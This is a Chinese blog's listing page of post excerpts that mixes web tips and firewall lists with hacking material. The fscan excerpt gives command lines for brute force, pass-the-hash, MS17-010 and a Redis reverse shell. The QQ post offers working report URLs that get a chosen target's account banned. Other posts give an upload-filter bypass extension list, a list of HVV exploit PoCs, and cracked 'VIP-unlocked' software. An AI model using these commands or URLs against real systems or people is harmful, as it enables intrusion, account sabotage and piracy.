• 逍遥商城系统最新版源码分享

    源码介绍   今天给大家实战搭建一下逍遥商城系统最新版   这个版本是无授权的,拿去用就可以了   搭建教程   1.创建网站,上传源码至网站根目录,解压、   解压完成后直接打开域名进行安装   现在是未安装的状态,我们输入后缀去安装   2.安装地址:域名/install/index.php   数据库信息和账号密码,自己去输入就可以,   接下来安装安装步骤来就OK   我们先打开前台看看,页面和某宝,某站相似!!!   我们现在打开后台看看后台地址:域名+/admin/webadmin.php,功能还是挺多的   功能还是挺全面的,大家就自己去探讨了,以上就是今天的搭建教程,   功能都是完美的,源码都是完美修复整理过的。   后台的信息什么的,自己就可以在后台根据需要更改,没什么难的东西     下载链接:https://wwp.lanzoup.com/i9T3F0l44q5g     ...

    2023-01-17 250
  • Element UI隐藏table滚动条

    当table内容列过多时,可通过height属性设置table高度以固定table高度、固定表头,使table内容可以滚动现在需要去除滚动条 CSS /deep/.el-table__body-wrapper { &::-webkit-scrollbar { // 整个滚动条 width: 0; // 纵向滚动条的宽度 background: rgba(213,215,220,0.3); border: none; height: 0; } &::-webkit-scrollbar-track { // 滚动条轨道 border: none; } }...

    2023-01-10 268
  • 淘宝商品采集器 全页搜索 自动爬取

    【软件名称】淘宝商品采集器【软件大小】28.6MB【使用平台】window系统 【使用说明】单页搜索:只爬取商品的第一页,开启倒叙爬取,只爬取商品最后一页。全页搜索:爬取商品的所有页面从第一页爬到尾页,开启倒叙爬取,会从商品末尾页爬到第一页。指定搜索:可以爬取商品指定页面。段落搜索:爬取商品第几页到第几页的页面。页数显示:鼠标左键页数是可以爬取下一页的,鼠标右键页数是可以爬取上一页的。关于获取不到问题:正常情况下是因为该商品没有你要的数据,如果什么都获取不到,检查是不是网络问题,或者登录页面刷新检查是不是需要人机验证了验证一下,实在不行那你就去刷新登录,重新登录一下,硬核一点解决就是换号换IP地址。提醒一下:本人软件没有使用线程功能,所以可能会有点小卡顿,但这不影响爬取页面功能。【下载地址】https://lbzyw-xyz.lanzouo.com/iWIaj0kl7isf...

    2023-01-10 292
  • 鸡语-内容伪装加密解密工具

    鸡语-内容伪装加密解密工具 下载地址 :加入下方QQ群...

    2023-01-10 315
  • 易支付搭建源码分享

    易支付搭建源码分享 需要的工具工具: 1.浏览器2.一台服务器或者主机3.下载好的源码安装教程:第一步:首先我们进入已有的主机/服务器控制面板第二步:点击文件管理,上传下载好的源码并解压第三步:点击域名管理绑定域名第四步:切换php版本,最好是7.2这样性能最佳,不能低于5.2第五步:访问你的域名按操作提示安装第六步:安装完成你就可以配置信息进行使用了对接推荐V免签 ↓#V免签app修复版+对接易支付教程#新功能:域名授权需要伪静态:location / { if (!-e $request_filename) {   rewrite ^/(.[a-zA-Z0-9\-\_]+).html$ /index.php?mod=$1 last; } rewrite ^/pay/(.*)$ /pay.php?s=$1 last;}location ^~ /plugins {  deny all;}location ^~ /includes {  deny all;}   下载地址  蓝奏网盘 ...

    2023-01-09 297
  • 网站防扒技术合集

    1.禁用浏览器右键菜单       document.oncontextmenu = new Function("return false;"); 2.监听键盘事件       function mAlert() { var fn = function () {}; fn.toString = function () { window.location = 'about: blank'; console.log("呵呵"); } console.log("%c", fn);//请不要删除这行 };mAlert(); 3.检测控制台       function mAlert() { var fn = function () {}; fn.toString = function () { window.location = 'about: blank'; console.log("呵呵"); } console.log("%c", fn);//请不要删除这行 };mAlert(); 4.鼠标点击事件       document.onmousedown = function mdClick(event) { var e = event || window.event || arguments.callee.caller.arguments[0]; if (e.button == 2 || e.button == 3) { alert("呵呵"); //不建议用以下方法,易错率大 window.location = 'about: blank'; } } 5.禁止保存       document.onkeydown = function() { if ((e.ctrlKey) && (e.keyCode == 83)) { //ctrl+s alert("ctrl+s被禁用"); return false; } } css禁止左键右键       //左键 〈body onselectstart="return false"〉   //右键 〈body οncοntextmenu='return false'〉 ...

    2023-01-07 270
  • emlog程序开源资源网模板

    <p><a href="https://www.qqhjy.com/content/uploadfile/202301/d2b51672917917.png" target="_blank" rel="noopener"><img src="https://www.qqhjy.com/content/uploadfile/202301/d2b51672917917.png" alt="image.png"></a></p> 先运行模板目录下文件初始化域名/content/templates/weike/update.php然后首页下面会有一个小分区报错只需在模板设置的人气排行右侧专区那里填个分类id即可模板不依赖模板设置插件。 下载地址: 点击下载...

    2023-01-06 245
  • 渐变3D旋转的个人导航主页源码分享

    渐变3D旋转的个人导航主页源码分享 演示图: 图是别人的演示站截的,推广名称等源码已修改 蓝奏云 https://xl6x.lanzout.com/ib3Pg0k720uf ...

    2023-01-06 224
  • 安卓大师兄影视v3.0.0去广告VIP绿化版

    软件介绍 大师影视,安卓影视聚合应用,采集全网影视资源,跟大部分的影视应用稍有不同,大师兄影视主要采用自建高清源,片源存储国内服务器,所有视频无广告水印,支持蓝光1080P/倍速播放/TV投屏功能。 软件截图 版本特点 解锁VIP、去首页横幅广播 去分享标签,界面更加美观 去我的标签无用界面更简洁 禁止开机自启,去更新提示 下载链接:https://dufeng.lanzoum.com/iggwU0jyzbaf ...

    2023-01-03 453
  • 斗象DayBreak自动化渗透测试工具

    斗象DayBreak自动化渗透测试工具 核心特性: 1.实战化: 依托漏洞盒子10W+白帽多年沉淀下来的攻防经验,从实战出发,以专业视角将经验转化为产品能力 2.轻量化: 通过非常轻量级地方式安装软探针,即用即走可无限拓展,保障有效性的同时更加方便快捷 3.自动化: 内置多个扫描引擎,周期化、自动化、可持续性地执行任务,实现全场景、全时段、模拟攻击评估 4.社区化: 鼓励企业安全部门像“黑客”一样思考和行动,打造开放包容,人人都是“开发者”的社区精神 支持多平台(win, linux, macos) 下载 DayBreak: 前往https://daybreak.tophant.com/ 进行下载 首次打开会进入激活页面,需要前往 https://daybreak.tophant.com/ 填写QQ邮箱申请 ...

    2022-11-28 307
  • 2022HVV POC合集

    =================================== 免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。 0x01 工具介绍 泛微云桥e-Bridge存在SQL注入漏洞 2022/7/11 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11894 Apache Commons远程代码执行漏洞(CVE-2022-33980) 2022/7/7 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-10567 GitLab远程代码执行漏洞(CVE-2022-2185) 2022/7/1 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-10296 泛微OA存在SQL注入漏洞(CNVD-2022-43843) 2022/6/30 新近真实漏洞 https://www.cnvd.org.cn/flaw/show/CNVD-2022-43843 通达OA存在代码执行漏洞 2020/8/20 历史真实漏洞 https://mp.weixin.qq.com/s/II1s-xwn4lD5_couvadI9g 用友U8-OA企业版存在SQL注入漏洞(CNVD-2022-31182) 2022/4/30 新近真实漏洞 https://www.cnvd.org.cn/flaw/show/CNVD-2022-31182 泛微OA存在命令执行漏洞(CNVD-2022-06870) 2022/2/13 新近真实漏洞 https://www.cnvd.org.cn/flaw/show/CNVD-2022-06870 FastJson代码执行漏洞 无已知公开的与情报对应的新近漏洞 致远A8 getshell 2019/6/26 历史真实漏洞 https://cn-sec.com/archives/1101195.html 禅道存在SQL注入漏洞(CNVD-2022-42853) 新近真实漏洞 FastJson代码执行漏洞 (CVE-2022-25845) 2022/5/23 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-7654 万户OA getshell 历史真实漏洞 http://cn-sec.com/archives/75986.html 蓝凌OA远程代码执行漏洞 2021/4/9 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2021-13023 拓尔思mas5 getshell 2022/4/28 新近真实漏洞 https://www.little2pig.work/archives/trs-mas http://cn-sec.com/archives/960259.html thinkphp远程代码执行漏洞 2018/12/9 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11895 jboss EAP /AS 6.远程代码执行 2019/12/11 历史真实漏洞 https://packetstormsecurity.com/files/167730/JBOSS-EAP-AS-6.x-Remote-Code-Execution.html https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf thinkphp任意文件读取 2018/12/9 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11895 明御Web应用防火墙任意登录 2022/7/24 历史真实漏洞,安恒已辟谣存在新近漏洞 http://cn-sec.com/archives/1196646.html Laravel存在命令执行漏洞(CNVD-2022-44351) 2022/6/7 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-8513 安恒web应用防火墙远程命令执行漏洞 2022/7/24 历史真实漏洞,安恒已辟谣存在新近漏洞 https://mp.weixin.qq.com/s/VdCjgxDL9qoAWIax5G3e0g http://cn-sec.com/archives/1196646.html 某软sdp软件定义边界系统命令执行漏洞 无已知公开的与情报对应的新近漏洞 某软网络准入控制系统反序列化漏洞 无已知公开的与情报对应的新近漏洞 某某服VPN存在远程缓冲区溢出漏洞(非web端口) 无已知公开的与情报对应的新近漏洞,深信服已辟谣,历史相关的漏洞见相关链接 https://security.sangfor.com.cn/index.php?m=&c=page&a=view&id=19 https://security.sangfor.com.cn/index.php?m=&c=page&a=view&id=18 某盟NF防火墙版本<6.0.3.198存在远程命令执行漏洞 无已知公开的与情报对应的新近漏洞 qax天擎版本<6.7.0.4910存在安全漏洞 无已知公开的与情报对应的新近漏洞 通达 OA 后台 SQL 注入漏洞 2022/7/25 新近真实漏洞 https://mp.weixin.qq.com/s/HU-KxA75PR3u47QOqKWktQ 通达 OA 后台文件上传漏洞 2022/7/25 新近真实漏洞 https://mp.weixin.qq.com/s/HU-KxA75PR3u47QOqKWktQ 华天动力OA前台任意文件上传漏洞 2022/7/25 存在性未确认,且大概率不影响最新版本 启明星辰天玥网络安全审计系统SQL注入0day 2021/7/15 历史真实漏洞 https://woj.app/7183.html uniview监控设备oday 2018/2/7 历史真实漏洞 https://vulners.com/zdt/1337DAY-ID-29739 蓝凌OA授权RCE和未授权RCE 2022/7/12 新近真实漏洞 https://mp.weixin.qq.com/s/zV4h5d9DrI7Nm49suSzIWw PHP 8.1.0-dev RCE 2021/5/23 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2021-27111 泛微Office 10 SQL注入漏洞 2021/8/13 历史真实漏洞 https://www.buaq.net/go-86552.html org.webjars:dojo 包 <1.17.2 多个漏洞 2021/7/31 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2021-3594 锐捷网络设备多个存在逻辑漏洞,可绕过身份验证登录多个系统 2022/6/21 新近真实漏洞 疑似用友NC 0day 2021/11/15 历史真实漏洞 https://www.cnsrc.org.cn/hw/1911.html https://decoded.avast.io/janneduchal/analysis-of-attack-against-national-games-of-china-systems/ Coremail Air邮件客户端附件后缀名显示不正确 2022/7/26 新近真实漏洞,厂商已确认 https://community.icoremail.net/article/460?bsh_bid=5789296111 泛微 V9 文件上传漏洞 2022/7/26 存在性未确认 小鱼易连疑似0day 2022/7/26 存在性未确认 泛微 E-office 文件包含漏洞(CNVD-2022-43247) 2022/6/8 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11900 泛微 E-office SQL 注入漏洞(CNVD-2022-43246) 2022/6/8 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11899 禅道 v16.5 SQL注入漏洞 2022/7/25 新近真实漏洞 https://github.com/z92g/ZentaoSqli 0x02 项目链接下载 添加下方QQ群...

    2022-11-26 413
  • 文件上传漏洞 部分解析后缀

    文件上传漏洞部分解析后缀 asp/aspx: asp,aspx,asa,asax,ascx,ashx,asmx,cer,aSp,aSpx,aSa,aSax,aScx,aShx,aSmx,cEr php: php,php5,php4,php3,php2,pHp,pHp5,pHp4,pHp3,pHp2,html,htm,phtml,pht,Html,Htm,pHtml jsp: jsp,jspa,jspx,jsw,jsv,jspf,jtml,jSp,jSpx,jSpa,jSw,jSv,jSpf,jHtml ...

    2022-11-21 259
  • 内网综合扫描工具 -- fscan

    ================================== 免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。 0x01 工具介绍 一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 0x02 安装与使用 fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)fscan.exe -hf ip.txt (以文件导入)fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx(wmiexec无回显命令执行) 0x03 项目链接下载 1.加巅峰阁QQ群,群文件下载 ...

    2022-11-21 336
  • QQ大规模封号事件分析

    最近两天QQ出现了大规模封号的情况,当然,我在推送群里的几个QQ也被封了,自己用的大号还健在。 结果就有热心网友找到了漏洞相关的POC,先对马叔叔(10001)进行了一波尝试,结果发现没有效果。 然后就拿我大号进行了测试,当时,我正好在吃饭,结果GG了……  0:00 / 00 漏洞产生的原因 客户端版本较多导致可能存在一些没有废弃的旧版接口 可以在URL中修改eviluin、text_evidence字段,就可以修改要举报的QQ号和证据 漏洞POC 目前看应该是已经和谐了,我们将其中的URL也分享出来供大家学习参考 漏洞URL样本一 您需要将QQ号替换为目标的QQ号 https://jubao.qq.com/uniform_impeach/impeach_entry?system=PC&version=5887&appname=PCQQ&appid=2400002&subapp=group_vote&scene=20001&uintype=1&eviluin=https://jubao.qq.com/uniform_impeach/impeach_entry?system=PC&version=5887&appname=PCQQ&appid=2400002&subapp=group_vote&scene=20001&uintype=1&eviluin=QQ号&evilnick=%E7%8C%AA%E7%8C%AA%E4%BE%A0&srv_para=chatmsg:&text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91;&img_evidence=&url_evidence=&video_evidence=&file_evidence=&audio_evidence=&user_input_param=&cryptograph=5773555d36d3e9fecc805877688f24af&salt=e9db1f69eb6c5cf54f8312227f405bcc&seqid=1037948812520221013&is_fake=0&impeach_tel=1&3eeaade917a2c33cc4710031c653b2bd885cbb42&input=%E7%A1%AE%E5%AE%9A&evilnick=%E7%8C%AA%E7%8C%AA%E4%BE%A0&srv_para=chatmsg:&text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91;&img_evidence=&url_evidence=&video_evidence=&file_evidence=&audio_evidence=&user_input_param=&cryptograph=5773555d36d3e9fecc805877688f24af&salt=e9db1f69eb6c5cf54f8312227f405bcc&seqid=1037948812520221013&is_fake=0&impeach_tel=1&3eeaade917a2c33cc4710031c653b2bd885cbb42&input=%E7%A1%AE%E5%AE%9A 我们分析下上面的一些字段,目标QQ号使用的是eviluin,举报证据字段如下 text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91; 通过URL解码,我们可以看到里面有一些关键词,正是命中了这些关键词导致的用户被立刻封号 漏洞URL样本二 QQ号需要修改为目标QQ号 https://jubao.qq.com/uniform_impeach/impeach_entry?system=PC&version=5887&appname=PCQQ&appid=2400002&subapp=group_vote&scene=20001&uintype=1&eviluin=QQ号&evilnick=%E7%8C%AA%E7%8C%AA%E4%BE%A0&srv_para=chatmsg:&text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91;&img_evidence=&url_evidence=&video_evidence=&file_evidence=&audio_evidence=&user_input_param=&cryptograph=5773555d36d3e9fecc805877688f24af&salt=e9db1f69eb6c5cf54f8312227f405bcc&seqid=1037948812520221013&is_fake=0&impeach_tel=1&3eeaade917a2c33cc4710031c653b2bd885cbb42&input=%E7%A1%AE%E5%AE%9A 以上两个样本可以造成封号1、7天,其实就是利用了这些字段可以随意修改,而且大概率是从旧版电脑QQ上遗留的部分功能导致的。因此,做安全喜欢考古是一个很不错的思路,比方说从以前的老版本的应用上寻找一些可能还遗留的接口进行参数篡改,就会导致网上说的这种无违规(wwg)封号的情况 POC验证 在输入上面的URL,在手机客户端访问后,可以看到举报成功 当然我自己的号也不例外,被热心网友安排了一天的套餐 你可以去安全中心,输入对应的QQ检测封号情况 https://accounts.qq.com/login/limit 目前可以看到很多大佬的QQ都因为这个漏洞被临时封禁了 很多短位或者靓号也被热心网友给搞封了 这个漏洞目前应该是已经修复了,而且通过这个漏洞被封禁的账户现在也都解封了 ...

    2022-11-20 418
  • app敏感信息工具

    目前提取了APK内: 所有字符串 所有URLs 所有ip 可能是hash值的字符串 存在的敏感词(如oss.aliyun) 可能是accessKey的值 使用Python开发,依赖于apkutils模块,可执行文件使用pyinstaller打包。 链接: https://pan.baidu.com/s/11kbWMdoFUX8qnsb3FvySBg 提取码: pr39 ...

    2022-11-20 293
  • nginx禁止文件下载防止服务器被恶意扫描

    自从网站建立之初到现在网站有了规模后,每天都有无数个机器人来恶意扫描网站备份文件,日志多的让你觉的可怕,对于这种恶意扫描的方法就需要以彼之道,还施彼身,我们可以通过以下俩种方法来防止服务器被恶意扫描,其中以彼之道,还施彼身的方法,彧繎把它称为:防暴美学。 方法一 此种方法比较暴力,就是以彼之道,还施彼身,利用伪静态规则进行跳转下载,比如:扫描根目录下的 /web.rar,那么就会触发规则跳转到大文件下载地址,100G让他慢慢下载,下个爽,磁盘爆了才开心。 打开网站 Nginx 配置文件,将以下规则加入 server 内,完成配置,规则如下: server { ... # 专治扫描户 rewrite \.rar/?$ http://speedtest.tele2.net/100GB.zip permanent; rewrite \.tar/?$ http://speedtest.tele2.net/100GB.zip permanent; rewrite \.zip/?$ http://speedtest.tele2.net/100GB.zip permanent; rewrite \.sql/?$ http://speedtest.tele2.net/100GB.zip permanent; rewrite \.gz/?$ http://speedtest.tele2.net/100GB.zip permanent; rewrite \.7z/?$ http://speedtest.tele2.net/100GB.zip permanent; # 或者使用 rewrite \.(rar|zip|tar|sql|gz|7z)/?$ http://speedtest.tele2.net/100GB.zip permanent; ... } 如果你觉得 100GB 响应时间有点长,那么下面的小文件下载地址如下(资源来自互联网与本站无关): 新加坡: http://lg-sin.fdcservers.net/10GBtest.zip 日本: http://lg-tok.fdcservers.net/10GBtest.zip 香港: http://lg-hkg.fdcservers.net/10GBtest.zip 方法二 此方法最简单粗暴,直接网站 Nginx 配置文件里面添加以下的规则,针对服务器上经常让扫描的文件,进行直接禁止访问,请注意:资源下载网站请慎用,规则如下: server{ ... # 禁止访问指定文件 location ~ \.(zip|rar|sql|tar|gz|7z)$ { return 444; } ... } 以上 Nginx 规则就是当有用户或恶意扫描访问网站上的 zip|rar|sql|tar|gz|7z 等资源时,直接返回 444 错误码。 最后说明 以上方法各有千秋,但我更加喜欢第一种方法,以彼之道,还施彼身,像我的性格,既然来了,我也不好意思让人家空手而归是吧,而方法二之所以没有选择,是因为本站毕竟提供下载服务,如果直接全部禁止访问,那么用户就没办法下载了,所以资源下载网站请慎用方法二。 ...

    2022-11-02 261
  • 10款免费的开源软件防火墙应用推荐

    提起防火墙,我们通常会首先想到经典的商业版硬件防火墙,如Cisco ASA、Juniper SSG、Fortinet Fortigate等。其实,防火墙也可以是一个软件应用程序,只要将其安装到任何现有的服务器设备上即可使用。 在很多应用场景中,开源版的软件防火墙产品,可以在更经济的成本投入下,实现与硬件防火墙产品相媲美的特性和功能。同时,开源模式还允许用户完全独立地分析和修改软件,能够促进用户之间的协作,从而开发更多样化的场景应用功能,比如防病毒、反垃圾邮件、Web过滤和内容过滤等。以下收集整理了10款可以免费下载和使用的开源版软件防火墙产品。 01 Perimeter 81 Perimeter 81的防火墙即服务(FWaaS)易于配置,让用户可以安全远程访问公司办公室外面基于云的资源。它还允许管理员根据用户或用户组身份,对特定网络资源的访问进行分段。与传统防火墙不同,Perimeter 81的FWaaS可以立即部署在云端。FWaaS包含基于权限的细粒度策略和用户分段,在保护公司资源和远程工作人员方面有较好的效果。它还兼容目前主流的服务器设备(Windows、Mac、iOS、Android和Linux服务器)。 主要功能: 安全的远程访问 与云无关的集成 易于配置和维护 细粒度用户分段 易于实施的安全策略 单一平台上的集中式管理 高度可扩展 更好的可见性 详情链接: https://www.perimeter81.com/ 02 pfSense pfSense建立在FreeBSD系统上,是一个免费的防火墙和路由器,可以在家庭网络和企业环境中使用。用户可以将其安装在本地的物理机器或虚拟机上,并可以通过基于web的界面编辑设置,这使得一般的中小型企业用户、初级网络管理员很容易进行设置。pfSense的主要优点是持续的支持。pfSense每年会提供商业化的会员服务,会员可以获得一些额外的服务支持,比如来自开发人员的指导视频账号、有关pfSense的数字书籍以及自动备份功能等。 主要功能: 禁用过滤 网络地址转换(NAT) 高可用性(HA) 多广域网(Multi-WAN) 负载均衡 虚拟专用网络(VPN) PPPoE 服务器 图形和日志监控 动态DNS 强制门户认证 DHCP服务器和DHCP中继 详情链接:https://www.pfsense.org/ 03 Untangle Firewall Untangle开源防火墙基于Debian 8.4,其免费版提供了基本的网络功能和安全功能,收费版添加了额外的功能特性,都通过基于Web的用户界面进行配置和管理。这款防火墙的技术名称是NG Firewall,很容易在任何硬件或虚拟机上安装这个防火墙系统,或者购买预装NG Firewall的设备,跟上面提到的pfSense应用模式基本一样。 主要功能: 简化版垃圾邮件拦截器 网络钓鱼拦截器 病毒拦截器 OpenVPN 入侵预防 广告拦截器 受限制门户 Web监控器 详情链接:https://www.untangle.com/ 04 OPNsense防火墙 OPNsense是功能较完整的开源防火墙,基于FreeBSD研发,比基于Deciso开发的方案在功能表现上更胜一筹。OPNsense算是pfSense的分支,是从m0n0wall脱离出来的,始于2015年1月。同时,当m0n0wall在2015年2月关闭时,发明者Manuel Kasper将开发者社区转给了OPNsense。OPNsense拥有基于Web的用户界面,可用在i386和x86-64平台上运行。 主要功能: 转发代理缓存 强制门户认证 流量整形器 虚拟专用网络 高可用性和硬件故障切换 支持插件 DNS服务器DNS转发器 内置的报告和监控工具 DHCP服务器和中继 入侵暴露和联机防护 详情链接:https://opnsense.org/ 05 Iptables Iptables是面向Linux应用程序的知名开源防火墙产品之一,它实际上是用Linux内核防火墙开发的,同时也有自定义的字符串和存储系统。不同的内核模块和应用程序会用于不同的协议。Iptables这一名称通常也用于指内核级元素,代表全部四个内核模块(iptables、ip6tables、arptables和ebtables)所共享使用的内核模块代码,它还实现了用于不同扩展的API。 主要功能: 针对三条内置链的链相关操作 目标处置 针对TCP、UDP和ICMP头字段的匹配操作 详情链接: https://cybersecuritynews.com/linux-firewall-iptables/ 06 IPFire IPFire是在Netfilter上开发的,是一款可以实现部分高级安全功能的开源防火墙。IPFire在版本升级和优化设计时充分考虑到了模块化和灵活性要求。在实际应用中,IPFire可以被作为防火墙、代理服务器或VPN网关。 IPFire由包括数千名开发人员的在线社区维护,因此这款轻量级开源程序的功能表现很强大。在最新版IPFire软件中已加入了入侵检测系统(IDS)来分析网络流量,并能够较准确地发现潜在漏洞。如果它检测到任何攻击,还会针对性地进行自动化阻止响应。 主要功能: 时间服务器 DHCP服务器 动态DNS 缓存域名服务器 入侵检测系统 局域网唤醒 详情链接:https://www.ipfire.org/ 07 Shorewall Shorewall是一款免费的Linux防火墙,可以在服务器或路由器上安装。它也是一种IPtables配置工具,可以将现有的服务器设备转变成硬件防火墙设备。用户可以下载适合其需求的不同Shorewall软件发行版。用户也可以下载双接口的Linux系统,作为小型家庭网络的防火墙/路由器。通过三接口系统,用户可以设置防火墙/路由器并添加DMZ。 主要功能: 出色的配置界面 每个区域多个接口 每个接口允许多个区域 确保正确访问的不同规则 网络接口数量没有限制 完全可以定制 详情链接:http://www.shorewall.org/ 08 SmoothWall Smoothwall是一款基于Linux的防火墙,它通过基于Web的GUI进行配置和维护,几乎不需要懂得Linux就可以安装和使用它。Smoothwall支持LAN、DMZ、网络防火墙、Web代理和流量统计等功能。此外,关闭或重启功能可以通过访问Web界面来实现。 主要功能: 出站过滤 修改访问时间 易于使用,提供更好的服务质量 UPnP支持 阻断错误IP地址 详情链接:http://www.smoothwall.org/ 09 Endian Endian Firewall Community(EFW)为用户提供基于linux的安全解决方案。虽然软件是免费的,但开发人员不提供支持。借助该软件,用户和开发人员可以根据需要快速设置基本的Web和电子邮件安全机制,同时还可以获得开源防病毒保护和VPN功能。 主要功能: 电子邮件安全 多广域网 入侵防护 服务质量 详情链接:https://www.endian.com/ 10 ClearOS ClearOS是一款开源版的统一威胁管理(UTM)解决方案,通过与应用程序同名的附件包来提供120多种安全防护功能,所有这些功能都可以通过基于Web的界面进行配置。 此外还有虚拟化的ClearVM方案,可用于在物理服务器上部署多个ClearOS虚拟机,支持多个Linux发行版系统甚至是Windows操作系统。 主要功能: IPSEC PPTP OpenVPN 入侵检测和防护系统 状态防火墙、网络和安全 电子邮件服务 Web代理 详情链接:https://www.clearos.com/ ...

    2022-08-28 300
  • 2022目前可以使用的QQ机器人框架大全集合

    前言 最近myqq因为不可控因素,被迫停运了,听说是被警察盯住了,下面晓白分享一下目前还是可以使用的机器人框架,大家可以有选择的去使用 1.小栗子QQ机器人【单Q/多Q/多Q10IP收费】 官网:https://www.xiaolz.cn 社区:https://bbs.xiaolz.cn 授权:https://www.xlz.plus/ 2.酷喵QQ机器人【免费】 官网:https://kumbot.cn/ 社区:https://bbs.kumbot.cn/ 3.梦幻QQ机器人【免费】 官网:https://drea.cc/ 社区:https://drea.cc/forum.php 4.OIVA QQ机器人【免费】 官网:https://oiva.cc/ 社区:https://bbs.oiva.cc/ 5.ER QQ机器人【PC/安卓 付费】 官网:https://erbot.cn/ 社区:https://bbs.erbot.cn/ 6.ONO QQ机器人【单Q免费/多Q付费】 官网:http://www.onoqq.com/ 社区:http://bbs.onoqq.com/ 7.NUT QQ机器人【Air免费/Pro付费】 官网:http://www.nutqq.com/ 社区:https://bbs.nutqq.com/ 8.ISKY QQ机器人【免费】 官网:https://iskybot.cc/ 社区:https://b.iskybot.cc/ 9.QY QQ机器人【免费】 官网:https://qvbot.com/ 社区:https://qvbot.cn/ 10.小羽+QQ机器人【免费】 官网:https://lyplus.cc/ 社区:https://forum.lyplus.cc/ 11.小O QQ机器人【免费】 官网:https://ovqq.cc/ 社区:https://ioq.ink/ 12.小Q QQ机器人【未知】 官网:http://www.xqbot.cc/ 社区:http://bbs.xqbot.cc/ 13.STAR QQ机器人【未知】 官网:没有 社区:http://bbs.starqq.xyz/ 14.炸毛QQ机器人框架 【免费开源】 官网:https://framework.zhamao.xin/ 社区:没有 15.MIRAI QQ机器人【免费】 官网:https://github.com/mamoe/mirai 社区:https://mirai.mamoe.net/ 16.海天QQ机器人【免费】 官网:https://www.haitianx.cn/ 社区:不能访问 A.已经停运和跑路的框架集结 1.MYQQ机器人 【各种不可抗因素承受不住停运了】 2.先驱QQ机器人【早跑了】 3.乾坤QQ机器人 【跑路了】 4.MINIQQ机器人 【我不清楚,突然没了。】 5.CATQQ机器人 【卷钱跑路好几次了】 6.VLQ QQ机器人【还没正式版就停运了】 7.晨风QQ机器人 【我不多说了哈】 8.酷Q QQ机器人【因为压力,停运不干了。】 9.柠檬QQ机器人 【我没用过就突然消失了。】 10.小小机器人 【没活太久就倒闭了。】 11.NAN QQ机器人 【停运了。】 12.PQ QQ机器人【停运了。】 13.FN QQ机器人【停运了。】 14.可爱猫机器人 【停运了。】 15.小迪迪框架 【官网进不去了。】 16.契约框架【就没了。。。。】 17.精灵QQ机器人【跑路了。】 ...

    2022-07-26 1340
